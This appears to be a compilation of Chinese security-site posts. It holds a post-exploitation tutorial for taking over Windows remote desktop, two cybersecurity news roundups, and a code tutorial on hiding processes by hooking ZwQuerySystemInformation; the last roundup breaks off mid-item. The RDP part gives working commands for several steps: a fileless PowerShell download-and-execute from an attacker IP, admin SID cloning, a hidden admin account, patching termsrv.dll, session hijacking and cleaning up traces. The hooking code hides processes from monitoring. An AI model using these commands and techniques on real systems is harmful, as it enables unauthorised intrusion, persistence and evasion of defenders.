前言 Windows远程桌面简介 远程桌面协议(RDP)是一个多通道(multi-channel)的协议，让使用者连上提供微软终端机服务的计算机(称为服务端或远程计算机) 远程桌面的前置条件 在获取权限后，针对3389进行展开，先查询3389端口是否开启 netstat -ano | findstr 3389 发现没有开启（也有可能更改了端口），则可以通过注册表进行手动启动（需要管理员权限） REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f     （开启） REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f     （关闭） 若执行失败，可能由于系统版本过旧（以下开启命令适用于Windows Server 2003之前系统） wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 1（开启） wmic path Win32_TerminalServiceSetting where (__class = "Win32_TerminalServiceSetting") call SetAllowTSConnections 0（关闭） 有些运维人员会勾选”仅允许使用网络级别的身份验证的远程桌面的计算机连接”选项，我们也可以通过注册表进行关闭，避免影响连接（开启同理0替换成1） REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f 为了避免运维人员更改了RDP端口，可以确认下RDP端口 reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /V PortNumber 正常若是3389端口为0xd3d（默认是十六进制表示） 在这里还需要保证防火墙等安全设备没有禁止且相互之间网络必须相通，这里防火墙设置只允许单独端口放通，减少运维人员的警觉（只允许3389端口放通） netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow 通过命令删除防火墙的通行策略（清理痕迹） netsh advfirewall firewall delete rule name="RemoteDesktop" 克隆账户接管administrator桌面 适用场景 在无法获取明文密码或者Hash等凭据，但是想接管实时的administrator桌面 利用步骤（默认情况下需要system权限） 在administrator权限下进行切换（利用PsExec工具进行powershell无文件落地上线system权限） shell "PsExec64.exe -accepteula -s powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.108.132:8080/a'))"" （-accepteula同意最终用户许可协议End User License Agreement，否则会弹窗无法运行） 查询用户的SID，方便选择克隆对象（常克隆Guest用户，系统自带不易察觉且默认的SID为501） 这里克隆administrator用户为Guest用户，将SID为500（对应十六进制为0x1f4）的管理员账号的相关信息导出为admin.reg regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 将注册表文件下载到本地方便编辑（下载后默认在本地CS目录的下的download文件夹下，文件下载后需要重命名） download admin.reg 将admin.reg文件的第三行HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4中的“1F4”修改为Guest的SID为1F5（十六进制），并保存为new.reg（方便区分） 将new.reg重新上传到受害机中 导入编辑好的new.reg文件 regedit /s new.reg 修改Guest密码便于远程登录，并及时清理两个reg文件 net user Guest Admin@123 del /F C:\Users\Administrator\Desktop\admin.reg C:\Users\Administrator\Desktop\new.reg 此时直接进行远程登录Guest账户，其实是administrator账户的系统，成功接管！ 新建隐藏管理员+远程软件+会话劫持组合拳接管administrator桌面 适用场景 在无法获取明文密码或者Hash等凭据，但是想接管实时的administrator桌面 利用步骤 添加新隐藏用户 net user yuzi$ Admin@123 /add 将新隐藏用户添加到管理员组 net localgroup administrators yuzi$ /add 此时直接进行远程登录隐藏账户，进行图形化操作 若遇到对方已有用户在线，可能会出现以下界面（Windows sever版本默认支持多用户同时在线，Windows其他版本不支持） 此时为了做到更加隐蔽的进行登录（强迫登录会使对方会话掉线），可以修改termsrv.dll文件实现，操作前要将所有权转移给本地管理员，向本地管理员组授予对termsrv.dll文件的“完全控制”权限（若是通过powershell无文件远控的形式执行如下命令可能会出现问题，则需要在可执行木马的远控场景执行命令） takeown /F c:\Windows\System32\termsrv.dll /A icacls c:\Windows\System32\termsrv.dll /grant Administrators:F 修改系统文件可能会导致系统不稳定，确保有原始termsrv.dll文件的备份 copy c:\Windows\System32\termsrv.dll termsrv.dll_backup 接下来将对方的c:\Windows\System32\termsrv.dll文件下载至本地 download c:\Windows\System32\termsrv.dll 在编辑dll前需要确认当前系统的版本号，查看Windows的版本号 powershell Get-ComputerInfo -Property WindowsVersion, OsName 通过十六进制文本编辑器进行编辑termsrv.dll文件，按照不同的Windows的版本查找对应的字符串标识，替换为B8 00 01 00 00 89 81 38 06 00 00 90 修改完成后上传至对方，进行强制替换系统自带的termsrv.dll，（替换前需要先停止远程服务，以免发生冲突，替换后再重新启用远程服务） net stop TermService /y copy /y C:\Users\Administrator\Desktop\termsrv.dll c:\windows\system32\termsrv.dll net start TermService 重新进行3389远程连接，发现已经可以直接登录到新建隐藏管理员桌面，不再出现提示页面 借助Windows的特性，直接在新建隐藏管理员桌面安装轻量级的远控桌面软件并运行（这里以GotoHTTP为例） 在攻击机本地进行GotoHTTP远程桌面时候，发现已经成功接管了administrator的实时桌面（由于GotoHTTP是以管理员身份运行的故显示的administrator桌面） 若运气不好，发现利用GotoHTTP远程后在锁定页面，此时还可以配合会话劫持进行接管administrator实时桌面 接下来进行劫持（劫持administrator的会话），查询可劫持的会话 quser 以管理员权限运行cmd，创建服务（用于会话劫持的权限需要system，恰好Windows的服务是以system权限运行，其中的1为需要劫持的ID值） sc create rdp binpath= "cmd.exe /k tscon 1 /dest:console" 启动并且删除服务后，发现此时的GotoHTTP页面已经成功进入解锁状态的桌面 sc start rdp & sc delete rdp & exit 远程结束后进行删除隐藏用户（清理痕迹，这类隐藏用户容易发现） net user yuzi$ /delete

1、恶意软件Turla利用LNK文件逃避技术发动新攻击 https://www.gdatasoftware.com/blog/2024/07/37977-turla-evasion-lnk-files 研究人员发现，恶意软件Turla利用恶意LNK文件发动新攻击。该攻击使用快捷方式文件执行无文件后门，通过内存修补、绕过AMSI、禁用系统事件日志等手段逃避检测。感染始于一个被入侵的菲律宾媒体网站，通过伪装成PDF文档的LNK文件进行传播。该恶意软件利用msbuild.exe加载后门，创建计划任务以达成持久化驻留。 2、Anatsa恶意软件利用Google Play应用进行传播 https://cybersecuritynews.com/malicious-qr-reader 研究人员最近在Google Play上发现了一个恶意二维码阅读器应用，该应用传播了Anatsa银行恶意软件，这是一种专门窃取用户敏感银行信息的恶意程序。目前该应用下载次数已达数千，对用户财务数据构成严重威胁。Anatsa恶意软件具备键盘记录、覆盖攻击和远程访问等高级功能，难以被传统安全措施检测。谷歌已迅速响应，从Play Store中移除了该应用，并加强了应用审查流程。 3、研究人员揭露Eldorado勒索软件新动态 https://www.group-ib.com/blog/eldorado-ransomware/ Eldorado勒索软件自3月份起便成为网络安全的新威胁，其RaaS模式已导致16家公司遭受攻击，主要在美国，影响房地产、教育、医疗保健和制造业等行业。研究人员发现，Eldorado的犯罪团伙在RAMP论坛上积极推广其恶意服务，并寻求合作伙伴。该勒索软件基于Go语言，能够加密Windows和Linux平台，在加密过程中会生成独特的密钥，并将勒索信放置在用户的文档和桌面文件夹中。研究人员强调Eldorado是一个独立的新威胁，并非现有勒索软件组织的分支。 4、Ghostscript存在沙盒绕过远程代码执行漏洞 https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/ 近日，一个被标记为中等严重性的Ghostscript漏洞（CVE-2024-29510）引发了安全研究人员的关注。研究人员揭露了一种攻击者可以绕过 Ghostscript默认沙盒设置并实现远程代码执行的方法。由于Ghostscript广泛用于Web应用程序和云服务中，用于文档转换和预览，因此该漏洞对这些服务构成了重大安全威胁。随着PoC的发布和漏洞受到更多关注，专家们强调了立即更新Ghostscript的紧迫性 5、研究人员公布Mallox勒索软件新变种解密器 https://www.uptycs.com/blog/mallox-ransomware-linux-variant-decryptor-discovered 网络安全研究人员公布了一种针对Linux系统，名为Mallox的勒索软件变种，目前其解密器已被发现。Mallox勒索软件自2021年中期以来一直活跃，此次变种使用Python脚本进行数据加密，并通过TOR网络进行数据泄露威胁。攻击者通过自定义脚本创建勒索软件加密器和解密器，加密文件后附加.lmallox扩展名，研究人员提供了寻找Mallox基础设施的方法，包括在FOFA和Censys上执行特定查询。 6、多国政府邮件服务器遭ProxyLogon与ProxyShell漏洞攻击 https://hunt.io/blog/proxylogon-and-proxyshell-used-to-target-government-mail-servers-in-asia-europe-and-south-america 据网络安全研究人员分析，一系列政府邮件服务器近期遭受了利用ProxyLogon和ProxyShell漏洞的网络攻击。这些攻击影响了多个国家和地区的政府机构，包括阿富汗、格鲁吉亚、阿根廷和老挝。攻击者通过一个在DigitalOcean上的服务器，通过公开的漏洞成功获取了对邮件服务器的未授权访问，并下载了官员间的通信记录。这一事件暴露了即使在漏洞被广泛知晓后，由 7、Microsoft SmartScreen漏洞被用于垃圾邮件攻击 https://cyble.com/blog/increase-in-the-exploitation-of-microsoft-smartscreen-vulnerability-cve-2024-21412/ 研究人员发现一个利用Microsoft SmartScreen漏洞（CVE-2024-21412）的垃圾邮件攻击活动正在增加。攻击者通过精心设计的电子邮件诱饵，包括医疗保险、交通通知和税务相关主题，诱导用户下载并执行恶意负载。攻击链涉及多阶段利用，包括forfiles.exe、PowerShell、mshta等合法工具，以及DLL侧加载和IDATLoader技术，最终部署Lumma 8、Roblox公司由于第三方服务商导致数据泄露 https://thecyberexpress.com/third-party-data-breach-exposes-roblox-data/ Roblox公司经历了一起数据泄露事件，该事件源自其年度开发者大会的第三方服务提供商。这次泄露涉及了通过第三方平台注册的现场和在线与会者的数据，包括全名、电子邮件和IP地址。Roblox公司，作为一家拥有超过2.14亿月活跃玩家的视频游戏开发商，主要用户群体为青少年，其数据安全尤为重要。尽管公司未确认是否有其他数据受到影响，但已在努力加强安全措施，以避免未来发生类似事件。与此同时，其他游戏平台如Teenpatti.com、Mobile Premie 9、Splunk修复关键远程代码执行漏洞 https://thecyberexpress.com/updates-released-for-splunk-vulnerability/ Splunk公司发布了一系列安全更新，以解决其Splunk Enterprise和云平台上的16个漏洞，其中包括高严重漏洞CVE-2024-36985，这是一个通过外部查找机制导致的远程代码执行(RCE)漏洞。此漏洞影响9.0.10、9.1.5和9.2.2之前的版本，攻击者可以利用它执行任意命令。Splunk建议用户立即更新至最新版本或暂时禁用受影响的应用程序以降低风险。此外，还包括了对跨站点脚本(XSS)、命令注入、拒绝服务(DoS)和不安全文件上传 10、南非国家医疗实验室遭勒索软件攻击，所有备份被清空 https://www.freebuf.com/news/405387.html 南非国家卫生实验室服务局（NHLS）是由政府运营的医疗检测实验室网络，该机构在从勒索软件攻击中恢复的过程中继续奋战，勒索软件攻击破坏了系统并删除了备份。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、APT44等组织对丹麦多个机构发起DDoS攻击 https://thecyberexpress.com/alleged-ddos-attack-on-denmark/ 安全研究人员发现丹麦遭遇了一系列DDoS攻击，据称由APT44和NoName057策划。这些攻击被认为是对丹麦空军司令Jan Dam宣布的再训练50名乌克兰F-16飞行员计划的回应。受影响的组织包括24tech.dk、丹麦税务局、丹麦国家银行、MitID和丹麦政府采购网站udbud.dk。这些攻击不仅影响了丹麦，也可能对整个欧洲和英国产生影响。目前，受影响组织尚未发表声明，攻击的真实性尚未得到证实。 2、研究人员发现针对HTTP文件服务器大规模攻击事件 https://asec.ahnlab.com/ko/67571/ 近日，安全研究人员发现针对HTTP文件服务器（HFS）的大规模攻击事件。HFS的2.3m版本被发现存在远程代码执行漏洞CVE-2024-23692，该漏洞允许攻击者通过发送恶意数据包来执行命令。概念验证（PoC）的发布加速了攻击的扩散，导致多种恶意软件如CoinMiner、RAT等被植入受影响的服务器。攻击者利用这一漏洞安装了XMRig CoinMiner进行加密货币挖掘，同时部署了LemonDuck等后门软件，进一步控制受感染的系统。研究人员警告，HFS用户应立即更新至最新版本，并加强网络安全防护措施，以防止此类攻击。 3、三菱电机发布漏洞列表并呼吁用户更新补丁 https://jvn.jp/vu/JVNVU98894016/ 近日，三菱电机的GENESIS64和MC Works64软件被披露存在多个重大安全漏洞，这些漏洞可能对工业控制系统的完整性和可用性构成威胁。具体漏洞包括资源分配不当、数字签名验证不足以及文件搜索路径控制缺陷，可能导致拒绝服务攻击和未授权程序执行。这些漏洞已被分配了CVE标识符，并通过CVSS评分系统进行了严重性评估。三菱电机建议用户立即应用安全补丁，加强网络安全措施，包括部署防火墙、限制物理访问、警惕未知来源的电子邮件附件和链接。 4、黑客组织声称窃取44万张Taylor Swift演唱会门票 https://hackread.com/ticketmaster-breach-shinyhunters-leak-taylor-swift-eras-tour-tickets/ ShinyHunters黑客组织披露了对Ticketmaster的大规模数据泄露事件，其中包括440000张泰勒·斯威夫特时代巡回演唱会门票的条形码，总计1.93亿条，涉及金额高达220亿美元。泄露的数据不仅包括门票信息，还有销售订单、订单详情、客户查询记录、电子邮件地址、信用卡信息等敏感数据。此次事件被认为是公开披露的最大规模客户个人信息泄露之一，对Ticketmaster的声誉和客户信任造成了严重损害，并使数 5、Shopify数据泄露事件疑与Evolve银行被入侵有关 https://thecyberexpress.com/hacker-shopify-data-breach/ 近日，一名自称为“888”的网络威胁行为体在BreachForums上分享了据称从Shopify平台窃取的数据，暗示此次数据泄露可能与Shopify Balance的合作伙伴Evolve Bank and Trust近期遭受的网络安全事件有关。据称，泄露的数据包括用户的个人详细信息、电子邮件订阅以及订单信息。Shopify是一家提供电子商务平台和集成服务的加拿大跨国企业，此次泄露的数据量高达179,873条记录。Evolve Bank and Trust作为Shopify Bala 6、以太坊邮件泄露引发3万多用户面临网络钓鱼风险 https://blog.ethereum.org/2024/07/02/blog-incident 以太坊社区（ethereum）遭遇了一起严重的网络安全事件。一名黑客成功入侵了以太坊的邮件列表提供商，并向35794个地址发送了包含恶意链接的钓鱼邮件。邮件伪装成来自ethereum.org的官方通知，诱使用户访问一个假冒网站，该网站部署了加密货币消耗器，意图清空用户的数字钱包。以太坊迅速响应，内部安全团队展开调查，并及时阻止了进一步的邮件发送。同时，通过社交媒体向社区发出警告，并与Web3钱包提供商合作，将恶意链接加入黑名单，避免了用户损失。 7、针对拉丁美洲金融系统Mekotio木马使用量激增 https://www.trendmicro.com/en_us/research/24/g/mekotio-banking-trojan.html 网络安全研究人员发现，一种名为Mekotio的银行木马病毒在拉丁美洲的金融系统中使用量激增。自2015年起，该恶意软件便活跃于巴西、智利、墨西哥、西班牙和秘鲁等国，专门窃取银行凭证等敏感信息。Mekotio通过伪装成税务机构的网络钓鱼邮件，诱使受害者下载并执行恶意软件，进而收集系统信息、执行凭证盗窃、信息收集以及维持其在受感染系统中的持久性。研究人员警告，Mekotio可能使受害者无法访问合法银行网站，并建议采取一系列预防措施，包括对未经请求的 8、开源云计算平台OpenStack组件中发现严重安全漏洞 https://cybersecuritynews.com/openstack-arbitrary-file-access-flaw/ 开源云计算平台OpenStack的Nova和Glance组件中发现严重安全漏洞CVE-2024-32498，允许攻击者未经授权访问主机系统上的任意文件。此漏洞可能暴露敏感数据，如用户数据、系统配置和安全凭证，增加数据泄露和系统完整性受损的风险。Red Hat将该漏洞评为严重，并由CVSS分配高严重性分数。Red Hat和OpenStack社区已发布补丁，建议用户立即更新并加强安全配置和监控，以保护云数据安全。 9、GeoServer和GeoTools修复严重XPath注入漏洞 https://thecyberexpress.com/xpath-expression-injection-vulnerabilities/ 开源地理空间数据处理工具GeoServer和GeoTools近期解决了两个严重的XPath表达式注入漏洞，这些漏洞被标识为CVE-2024-36401和CVE-2024-36404，存在远程代码执行的风险。漏洞允许攻击者通过OGC请求参数注入恶意XPath表达式，从而可能损害地理空间数据的安全性。受影响的版本包括GeoServer的2.23.6之前版本、2.24.0至2.25.1版本，以及GeoTools的29.6之前版本、30.0至31.1版本。官 10、Cloudflare将服务器中断归咎于BGP劫持事件 https://www.bleepingcomputer.com/news/security/cloudflare-blames-recent-outage-on-bgp-hijacking-incident/ Cloudflare近期遭遇了一次服务中断，其的1.1.1.1 DNS解析器服务在多个国家无法访问或性能下降。该事件归因于边界网关协议（BGP）劫持和路由泄漏，影响了70个国家的300个网络。Cloudflare迅速响应，通过与相关网络沟通和禁用问题对等会话来减轻影响，并在两小时内解决了劫持问题，路由泄漏也在数小时内得到修复。Cloudflare在其事后报告中提出了一系列长期解决方案 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 在之前几篇文章已经学习了解了几种钩取的方法 ● 浅谈调试模式钩取 ● 浅谈热补丁 ● 浅谈内联钩取原理与实现 ● 导入地址表钩取技术 这篇文章就利用钩取方式完成进程隐藏的效果。 进程遍历方法 在实现进程隐藏时，首先需要明确遍历进程的方法。 CreateToolhelp32Snapshot CreateToolhelp32Snapshot函数用于创建进程的镜像，当第二个参数为0时则是创建所有进程的镜像，那么就可以达到遍历所有进程的效果。 #include <iostream> #include <Windows.h> #include <TlHelp32.h> int main() {    //设置编码，便于后面能够输出中文    setlocale(LC_ALL, "zh_CN.UTF-8");    //创建进程镜像，参数0代表创建所有进程的镜像    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    if (hSnapshot == INVALID_HANDLE_VALUE)   {        std::cout << "Create Error" << std::endl;        exit(-1);   }    /*    * typedef struct tagPROCESSENTRY32 {    * DWORD dwSize; 　　　　　　　　　　　　　　进程信息结构体大小,首次调用之前必须初始化    * DWORD cntUsage; 　　　　　　　　　　　　 引用进程的次数,引用次数为0时,则进程结束    * DWORD th32ProcessID; 　　　　　　　　　　进程的ID    * ULONG_PTR th32DefaultHeapID; 　　　　 进程默认堆的标识符,除工具使用对我们没用    * DWORD th32ModuleID;                 进程模块的标识符    * DWORD cntThreads; 　　　　　　　　　　 进程启动的执行线程数    * DWORD th32ParentProcessID;           父进程ID    * LONG pcPriClassBase; 　　　　　　　　 进程线程的基本优先级    * DWORD dwFlags; 　　　　　　　　　　　　 保留    * TCHAR szExeFile[MAX_PATH];         进程的路径    * } PROCESSENTRY32;    * typedef PROCESSENTRY32 *PPROCESSENTRY32;    */    PROCESSENTRY32 pi;    pi.dwSize = sizeof(PROCESSENTRY32);    //取出第一个进程    BOOL bRet = Process32First(hSnapshot, &pi);    while (bRet)   {        wprintf(L"进程路径:%s\t进程号:%d\n", pi.szExeFile, pi.th32ProcessID);        //取出下一个进程        bRet = Process32Next(hSnapshot, &pi);   } } EnumProcesses EnumProcesses用于将所有进程号的收集。 #include <iostream> #include <Windows.h> #include <Psapi.h> int main() {    setlocale(LC_ALL, "zh_CN.UTF-8");    DWORD processes[1024], dwResult, size;    unsigned int i; //收集所有进程的进程号    if (!EnumProcesses(processes, sizeof(processes), &dwResult))   {        std::cout << "Enum Error" << std::endl;   }    //进程数量    size = dwResult / sizeof(DWORD);    for (i = 0; i < size; i++)   {        //判断进程号是否为0        if (processes[i] != 0)       {            //用于存储进程路径            TCHAR szProcessName[MAX_PATH] = { 0 };            //使用查询权限打开进程            HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |                PROCESS_VM_READ,                FALSE,                processes[i]);            if (hProcess != NULL)           {                HMODULE hMod;                DWORD dwNeeded; //收集该进程的所有模块句柄，第一个句柄则为文件路径                if (EnumProcessModules(hProcess, &hMod, sizeof(hMod),                    &dwNeeded))               {                    //根据句柄获取文件路径                    GetModuleBaseName(hProcess, hMod, szProcessName,                        sizeof(szProcessName) / sizeof(TCHAR));               }                wprintf(L"进程路径:%s\t进程号:%d\n", szProcessName, processes[i]);           }       }     } } ZwQuerySystemInfomation ZwQuerySystemInfomation函数是CreateToolhelp32Snapshot函数与EnumProcesses函数底层调用的函数，也用于遍历进程信息。代码参考https://cloud.tencent.com/developer/article/1454933 #include <iostream> #include <Windows.h> #include <ntstatus.h> #include <winternl.h> #pragma comment(lib, "ntdll.lib") //定义函数指针 typedef NTSTATUS(WINAPI* NTQUERYSYSTEMINFORMATION)( IN      SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT   PVOID                    SystemInformation, IN      ULONG                    SystemInformationLength, OUT PULONG                   ReturnLength ); int main() {    //设置编码 setlocale(LC_ALL, "zh_CN.UTF-8");    //获取模块地址 HINSTANCE ntdll_dll = GetModuleHandle(L"ntdll.dll"); if (ntdll_dll == NULL) { std::cout << "Get Module Error" << std::endl; exit(-1); } NTQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL; //获取函数地址 ZwQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(ntdll_dll, "ZwQuerySystemInformation"); if (ZwQuerySystemInformation != NULL) { SYSTEM_BASIC_INFORMATION sbi = { 0 };        //查询系统基本信息 NTSTATUS status = ZwQuerySystemInformation(SystemBasicInformation, (PVOID)&sbi, sizeof(sbi), NULL); if (status == STATUS_SUCCESS) { wprintf(L"处理器个数:%d\r\n", sbi.NumberOfProcessors); } else { wprintf(L"ZwQuerySystemInfomation Error\n"); } DWORD dwNeedSize = 0; BYTE* pBuffer = NULL; wprintf(L"\t----所有进程信息----\t\n"); PSYSTEM_PROCESS_INFORMATION psp = NULL;        //查询进程数量 status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &dwNeedSize); if (status == STATUS_INFO_LENGTH_MISMATCH) { pBuffer = new BYTE[dwNeedSize];            //查询进程信息 status = ZwQuerySystemInformation(SystemProcessInformation, (PVOID)pBuffer, dwNeedSize, NULL); if (status == STATUS_SUCCESS) { psp = (PSYSTEM_PROCESS_INFORMATION)pBuffer; wprintf(L"\tPID\t线程数\t工作集大小\t进程名\n"); do {                    //获取进程号 wprintf(L"\t%d", psp->UniqueProcessId);                    //获取线程数量 wprintf(L"\t%d", psp->NumberOfThreads);                    //获取工作集大小 wprintf(L"\t%d", psp->WorkingSetSize / 1024);                    //获取路径 wprintf(L"\t%s\n", psp->ImageName.Buffer);                    //移动 psp = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)psp + psp->NextEntryOffset); } while (psp->NextEntryOffset != 0); delete[]pBuffer; pBuffer = NULL; } else if (status == STATUS_UNSUCCESSFUL) { wprintf(L"\n STATUS_UNSUCCESSFUL"); } else if (status == STATUS_NOT_IMPLEMENTED) { wprintf(L"\n STATUS_NOT_IMPLEMENTED"); } else if (status == STATUS_INVALID_INFO_CLASS) { wprintf(L"\n STATUS_INVALID_INFO_CLASS"); } else if (status == STATUS_INFO_LENGTH_MISMATCH) { wprintf(L"\n STATUS_INFO_LENGTH_MISMATCH"); } } } } 进程隐藏 通过上述分析可以知道遍历进程的方式有三种，分别是利用CreateToolhelp32Snapshot、EnumProcesses以及ZwQuerySystemInfomation函数 但是CreateToolhelp32Snapshot与EnumProcesses函数底层都是调用了ZwQuerySystemInfomation函数，因此我们只需要钩取该函数即可。 由于测试环境是Win11，因此需要判断在Win11情况下底层是否还是调用了ZwQuerySystemInfomation函数。 可以看到在Win11下还是会调用ZwQuerySystemInfomation函数，在用户态下该函数的名称为NtQuerySystemInformation函数。 这里采用内联钩取的方式对ZwQuerySystemInfomation进行钩取处理，具体怎么钩取在已经介绍过了，这里就不详细说明了。这里对自定义的ZwQuerySystemInfomation函数进行说明。 首先第一步需要进行脱钩处理，因为后续需要用到初始的ZwQuerySystemInfomation函数，紧接着获取待钩取函数的地址即可。 ...    //脱钩    UnHook("ntdll.dll", "ZwQuerySystemInformation", g_pOrgBytes);    HMODULE hModule = GetModuleHandleA("ntdll.dll"); //获取待钩取函数的地址    PROC    pfnOld = GetProcAddress(hModule, "ZwQuerySystemInformation"); //调用原始的ZwQuerySystemInfomation函数    NTSTATUS status = ((NTQUERYSYSTEMINFORMATION)pfnOld)(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength); ... 为了隐藏指定进程，我们需要遍历进程信息，找到目标进程并且删除该进程信息实现隐藏的效果。这里需要知道的是进程信息都存储在SYSTEM_PROCESS_INFORMATION结构体中，该结构体是通过单链表对进程信息进行链接。因此我们通过匹配进程名称找到对应的SYSTEM_PROCESS_INFORMATION结构体，然后进行删除即可，效果如下图。 通过单链表中删除节点的操作，取出目标进程的结构体。代码如下 ... pCur = (PSYSTEM_PROCESS_INFORMATION)(SystemInformation);        while (true)       {            if (!lstrcmpi(pCur->ImageName.Buffer, L"test.exe"))           {                //需要隐藏的进程是最后一个节点                if (pCur->NextEntryOffset == 0)                    pPrev->NextEntryOffset = 0;                //不是最后一个节点，则将该节点取出                else                    pPrev->NextEntryOffset += pCur->NextEntryOffset;           }            //不是需要隐藏的节点，则继续遍历            else                pPrev = pCur;            //链表遍历完毕            if (pCur->NextEntryOffset == 0)                break;            pCur = (PSYSTEM_PROCESS_INFORMATION)((PBYTE)pCur + pCur->NextEntryOffset);       } ... 完整代码：https://github.com/h0pe-ay/HookTechnology/blob/main/ProcessHidden/inlineHook.c 但是采用内联钩取的方法去钩取任务管理器就会出现一个问题，这里将断点取消，利用内联钩取的方式去隐藏进程。 首先利用bl命令查看断点 紧着利用 bc [ID]删除断点 在注入之后任务管理器会在拷贝的时候发生异常 在经过一番调试后发现，由于多线程共同执行导致原本需要可写权限的段被修改为只读权限 在windbg可以用使用!vprot + address查看指定地址的权限，可以看到由于程序往只读权限的地址进行拷贝处理，所以导致了异常。 但是在执行拷贝阶段是先修改了该地址为可写权限，那么导致该原因的情况就是其他线程执行了权限恢复后切换到该线程中进行写，所以导致了这个问题。 因此内联钩取是存在多线程安全的问题，此时可以使用微软自己构建的钩取库Detours，可以在钩取过程中确保线程安全。 Detours 项目地址：https://github.com/microsoft/Detours 环境配置 参考：https://www.cnblogs.com/linxmouse/p/14168712.html 使用vcpkg下载 vcpkg.exe install detours:x86-windows vcpkg.exe install detours:x64-windows vcpkg.exe integrate install 实例 挂钩 利用Detours挂钩非常简单，只需要根据下列顺序，并且将自定义函数的地址与被挂钩的地址即可完成挂钩处理。 ...   //用于确保在 DLL 注入或加载时，恢复被 Detours 修改的进程镜像,保持稳定性 DetourRestoreAfterWith();        //开始一个新的事务来附加或分离        DetourTransactionBegin(); //进行线程上下文的更新        DetourUpdateThread(GetCurrentThread()); //挂钩        DetourAttach(&(PVOID&)TrueZwQuerySystemInformation, ZwQuerySystemInformationEx); //提交事务        error = DetourTransactionCommit(); ... 脱钩 然后根据顺序完成脱钩即可。 ...   //开始一个新的事务来附加或分离 DetourTransactionBegin(); //进行线程上下文的更新        DetourUpdateThread(GetCurrentThread()); //脱钩        DetourDetach(&(PVOID&)TrueZwQuerySystemInformation, ZwQuerySystemInformationEx); //提交事务        error = DetourTransactionCommit(); ... 挂钩的原理 从上述可以看到，Detours是通过事务确保了在DLL加载与卸载时后的原子性，但是如何确保多线程安全呢？后续通过调试去发现。 可以利用x ntdl!ZwQuerySystemInformation查看函数地址，可以看到函数的未被挂钩前的情况如下图。 挂钩之后原始的指令被修改为一个跳转指令把前八个字节覆盖掉，剩余的3字节用垃圾指令填充。 该地址里面又是一个jmp指令，并且完成间接寻址的跳转。 该地址是自定义函数ZwQuerySystemInformationEx，因此该间接跳转是跳转到的自定义函数内部。 跳转到TrueZwQuerySystemInformation内部发现ZwQuerySystemInformation函数内部的八字节指令被移动到该函数内部。紧接着又完成一个跳转。 该跳转到ZwQuerySystemInformation函数内部紧接着完成ZwQuerySystemInformation函数的调用。 综上所述，整体流程如下图。实际上Detours实际上使用的是热补丁的思路，但是Detours并不是直接在原始的函数空间中进行补丁，而是开辟了一段临时空间，将指令存储在里面。因此在挂钩后不需要进行脱钩处理就可以调用原始函数。因此就不存在多线程中挂钩与脱钩的冲突。 完整代码：https://github.com/h0pe-ay/HookTechnology/blob/main/ProcessHidden/detoursHook.c

1、APT 36组织针对游戏与武器爱好者投放间谍软件 https://www.sentinelone.com/labs/capratube-remix-transparent-tribes-android-spyware-targeting-gamers-weapons-enthusiasts/ 安全研究人员揭露了APT 36组织（又名Transparent Tribe或透明部落组织）的新动向，该组织自2016年起活跃，针对印度政府和军事人员。最新发现的CapraRAT APK攻击活动通过伪装成视频浏览应用，将间谍软件瞄准了手机游戏玩家、武器爱好者和TikTok用户。这些APK利用WebView技术启动YouTube或游戏网站，同时更新了底层代 2、Xctdoor恶意软件通过ERP更新服务在韩国传播 https://asec.ahnlab.com/en/67558/ 安全研究人员近期揭露了一起针对韩国国防和制造业的网络攻击事件，攻击者利用Xctdoor恶意软件通过韩国ERP解决方案的更新服务器进行传播。该恶意软件与2017年发现的Andariel组织使用的HotCroissant后门有相似之处。Xctdoor采用DLL格式，使用Go语言开发，具备多种信息窃取功能，包括屏幕截图、键盘记录等，并通过HTTP协议与C&C服务器通信。 3、FakeBat恶意软件通过驱动下载技术进行传播 https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ 网络安全研究人员通过分析，揭露了FakeBat的多个分发活动和其背后的基础设施。此外还发现，FakeBat的运营商在网络犯罪论坛上积极推广其服务，并且为客户提供了一种按安装付费的模式（LaaS）。为了对抗这种威胁，安全研究人员将持续监控FakeBat的C2服务器，并分享了入侵指标和跟踪方法，以帮助网络安全领域更好地防御此类攻击。 4、Orcinius木马利用VBA Stomping技术进行隐蔽攻击 https://blog.sonicwall.com/en-us/2024/06/new-orcinius-trojan-uses-vba-stomping-to-mask-infection/ 近日，安全研究人员详细分析了Orcinius木马的感染机制。该木马通过一个伪装成日历的Excel文件进行传播，该文件含有模糊处理的VBA宏，利用VBA 